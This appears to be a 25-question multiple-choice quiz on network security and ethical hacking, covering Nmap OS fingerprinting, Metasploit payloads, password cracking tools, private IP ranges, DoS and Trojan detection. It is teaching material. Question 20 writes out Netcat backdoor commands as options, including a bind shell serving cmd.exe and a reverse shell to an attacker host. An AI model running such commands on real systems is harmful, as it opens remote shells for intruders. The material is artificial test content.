Question 110-135

1.

1 point

_______ is the method used by Nmap to determine the operating system of the target computer.

Stack fingerprinting

Banner stamping

OS stamping

OS fingerprinting

2.

1 point

Metasploit offers a huge set of _____, that is, the code the attacker wants to run on the target machine, triggered by the exploit itself.

payloads

options

utilities

exploits

3.

1 point

In order to determine which class any IP address is in, one should examine the first _____ bits of the IP address.

3 bits

4 bits

5 bits

8 bits

4.

1 point

Which of the following is a weak password policy?

use minimum of 9 alphanumeric characters

implement aging password

use passphrases

use dictionary form password

5.

1 point

Each of the following is a characteristic of information except __________.

integrity

conformity

confidentiality

availability

6.

1 point

A password cracker is needed to quickly rediscover a password. It is believed the password is only seven characters long, but was computer generated. Which of the following techniques would be the best method to use?

Online guessing

Brute force

Dictionary

Hybrid

7.

1 point

In Microsoft Windows, the name of the background program, such as Svchost.exe, is called a ________.

Process

Service

Display service

Parent Service

8.

1 point

Which type of Buffer Overflow Exploits will cause the operating system to shutdown or crash?

Program Buffer Overflow

Heap Overflow

Stack-based Buffer Overflow

Memory buffer Overflow

9.

1 point

Which one of the following is not a private IP address?

10.1.2.1

165.193.123.44

172.18.36.4

192.168.0.234

10.

1 point

For Dos (Denial-of-Service) Attack, Stopping service can be achieved by:
i. Process killing
ii. Process crashing
iii. System reconfiguring
iv. Malformed packet attacks

i, ii and iii

i, ii and iv

i, iii and iv

All of the above

11.

1 point

The use of Domain Name System (DNS) is to _________.

translate computer's domain name into its appropriate IP address.

translate IP address into its appropriate computer's domain name.

translate computer's IP address into its approprate MAC address.

check for the correct computer's domain name.

12.

1 point

Which software tool can be used for sniffing password?

Brutus

John the Ripper

Cain

John the Sniffer

13.

1 point

Which of the following best describes a vulnerability?

A weakness in the configuration of software or hardware that could allow a threat to damage the network

Any agent that could do harm to your network or its components

The likelihood of a particular event happening given an asset and a threat

Measures the cost of a threat attacking your network

14.

1 point

Which of the following software is a good port scanning tool?

Telnet

Nmap

ipconfig

portscan

15.

1 point

You are connected to a server on the Internet and you click on a link on the server and receive a time-out message. What layer could be the cause of this message?

Transport

Physical

Application

Network

16.

1 point

What port does the netbus server listen on?

12345

12346

12347

any number greater than 12347

17.

1 point

Which of the following is associated with behaviors such as collecting personal information or changing your computer configuration, without appropriately obtaining prior consent?

Spyware

Trojan

Botnet

Rootkit

18.

1 point

Which software is used to extract password representations?

Cracker

John the Ripper

Pwdump3

Brutus

19.

1 point

HTTP, FTP and Telnet work at which layer of the OSI model?

Application

Presentation

Session

Transport

20.

1 point

Which Netcat command is used as a backdoor on window systems?

c:\>nc -l -p 12345 -e cmd.exe

c:\>nc -l -p 12345 -e /bin/sh

c:\>nc -l -p 12345 -e ncrelay.bat

c:\>nc [attackers_machine] 12345 -e /bin/sh

21.

1 point

Which of the following is NOT a countermeasures for password attack?

adopt a strong password policy.

educate user to security awareness

conduct password cracking tests.

store encrypted or hashed password files in user account.

22.

1 point

Which of the following is a hardware or software system used to protect a network from unauthorized access?

Firepot

Windows XP

Honeypot

Firewall

23.

1 point

You suspect that a system is infected with a Trojan Horse program and is sending data outbound from the system. Which of the following can be used to detect this activity?

Anti-spam software

Pop-up blocker

HIDS

Personal firewall

24.

1 point

During an audit of a server system log, which of the following entries would be considered a possible security threat?

Five failed login attempts on an admin account.

A 500K print job sent to a printer.

Two successful logins with the backup account.

Three new files saved in the accounting folder by user finance.

25.

1 point

Internet is 'managed' by

APNIC

ICANN

AfriNIC

ARIN